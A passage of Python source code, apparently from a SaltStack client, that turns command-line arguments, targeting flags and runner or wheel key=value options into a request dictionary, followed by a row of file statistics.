                    timeout_index = index
            # BUG FIX: same falsy-zero problem as the batch option above.
            if timeout_index is not None:
                args.pop(timeout_index)
                args.pop(timeout_index)

            # Map a leading targeting flag onto salt's expr_form name.
            target_dict = {
                "pcre": ["-E", "--pcre"],
                "list": ["-L", "--list"],
                "grain": ["-G", "--grain"],
                "grain_pcre": ["--grain-pcre"],
                "pillar": ["-I", "--pillar"],
                "pillar_pcre": ["--pillar-pcre"],
                "range": ["-R", "--range"],
                "compound": ["-C", "--compound"],
                "nodegroup": ["-N", "--nodegroup"],
            }
            for key, value in target_dict.items():
                if args[0] in value:
                    self.options["expr_form"] = key
                    args.pop(0)
            low["tgt_type"] = self.options["expr_form"]
            low["tgt"] = args.pop(0)
            low["fun"] = args.pop(0)
            low["arg"] = args
        elif self.client.startswith("runner") or self.client.startswith("wheel"):
            low["fun"] = args.pop(0)
            for arg in args:
                if "=" in arg:
                    key, value = arg.split("=", 1)
                    try:
                        # Decode JSON values (numbers, lists, ...) when possible.
                        low[key] = json.loads(value)
                    except json.JSONDecodeError:
                        low[key] = value
                else:
                    low.setdefault("arg", []).append(arg)
        else:
            # This should never happen
            return "Client not implemented: {0}".format(self.client)

        return [low]
| 34.488636 | 81 | 0.444481 | 304 | 3,035 | 4.361842 | 0.315789 | 0.047511 | 0.030166 | 0.033183 | 0.205128 | 0.184012 | 0.063348 | 0.063348 | 0.063348 | 0.063348 | 0 | 0.008441 | 0.414498 | 3,035 | 87 | 82 | 34.885057 | 0.73776 | 0.039209 | 0 | 0.185714 | 0 | 0 | 0.125773 | 0 | 0 | 0 | 0 | 0.011494 | 0 | 1 | 0.028571 | false | 0 | 0.028571 | 0 | 0.114286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.